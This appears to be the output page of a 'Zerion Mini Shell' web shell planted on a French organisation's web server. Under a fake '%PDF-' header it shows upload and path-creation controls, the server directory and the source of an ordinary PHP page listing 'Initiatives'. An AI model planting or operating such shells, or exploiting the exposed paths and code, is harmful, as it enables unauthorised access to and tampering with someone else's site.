%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/alliance/domains/sedl.alnetis.fr/public_html/
Upload File :
Create Path :
Current File : /home/alliance/domains/sedl.alnetis.fr/public_html/p-initiative.php

<?php
include_once("inc/config.php");
include_once("inc/functions.php");
include_once("inc/init.php");

//edition en cours 



//affichage du html
include("theme/html.php");
//affichage des metas
include("theme/meta.php");
echo "\n<title>".$admtext->getText("Initiatives",$lang->getlangid())." - ".$info_titresite."</title>\n";
?>
<meta property="og:type" content="non_profit"/>
<meta property="fb:app_id" content="307325492664749"/>
<meta property="og:url" content="<?php echo $url_site.$pageactu; ?>"/>
<meta property="og:site_name" content="<?php echo $info_titresite; ?>"/>
<?php
//affichage du header
include("theme/header.php");
//colonne de droite
include("theme/droite.php");




$type=$obj_activite->getType($_GET['type'],$lang->getlangid());
?>


<div class="ariane"><a href="<?=$lang->getlang()?>/initiatives.html"><span class="pays_lib"><?=$admtext->getText("Initiatives",$lang->getlangid())?></span></a>
<span class="pays_lib"><?=str_replace("[edition_titre]",$this_edition['titre'],$type['libelle'])?></span>

</div>
<br/>
<div class="page_pays page_carte">
	<h1><?=$admtext->getText("Initiatives",$lang->getlangid())?></h1>
	<h2><?=str_replace("[edition_titre]",$this_edition['titre'],$type['libelle'])?></h2>
	<?=$obj_activite->getTriActivite($_GET["type"],$lang->getlangid(),$this_edition['id'],null,$url_site);?>

</div>


<?php

//affichage du footer
include("theme/footer.php");

?>

Zerion Mini Shell 1.0